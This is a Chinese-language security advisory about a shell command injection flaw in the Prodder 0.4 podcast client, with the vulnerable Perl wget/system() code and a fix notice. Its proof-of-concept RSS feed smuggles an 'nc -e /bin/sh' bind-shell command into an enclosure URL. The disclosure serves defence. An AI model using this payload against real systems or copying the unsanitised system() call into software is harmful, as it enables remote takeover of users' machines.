首页 -> 安全研究

安全研究

安全漏洞
Prodder任意Shell命令执行漏洞

发布日期:2006-05-22
更新日期:2006-05-22

受影响系统:
Prodder Prodder 0.4
不受影响系统:
Prodder Prodder 0.5
描述:
BUGTRAQ  ID: 18068

Prodder是用Perl编写的基于命令行的Podcast客户端。

Prodder的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在客户端机器上执行任意命令。

在使用prodder获取媒体文件索引时,prodder会从服务器所提供的XML文件获取媒体文件的URL,然后使用wget获取文件。源码类似于:

[...]
446 # Actually get the file
447 my $wget_cmd = "wget -qc -a '$conf{'errorfile'}' "
448     . "--tries=3 --timeout=20 --random-wait '$enc_url' -P '$outdir'";
449
450     # Background the wgets if needed - this will assume
451     # the downloads dont fail (once they've started)
452     $wget_cmd .= " --background" if $conf{'background'};
453
454
455
456         print "Fetching item ($enc_url)... ";
457         if (! system($wget_cmd))
[...]

但没有正确的过滤448行的$enc_url,因此攻击者可以在URL中包含任意Shell命令然后使脚本调用system()执行。

<*来源:RedTeam (http://www.redteam-pentesting.de/)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114832106316234&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting Example Malicious Server Feed</title>

    <item>
        <enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh -l
-p 1337 &amp; ';#'"
         length="241734" type="audio/mpeg" />
    </item>
</channel>
</rss>

建议:
厂商补丁:

Prodder
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://prdownloads.sourceforge.net/prodder/prodder-0.5.tgz?download

浏览次数:3032
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障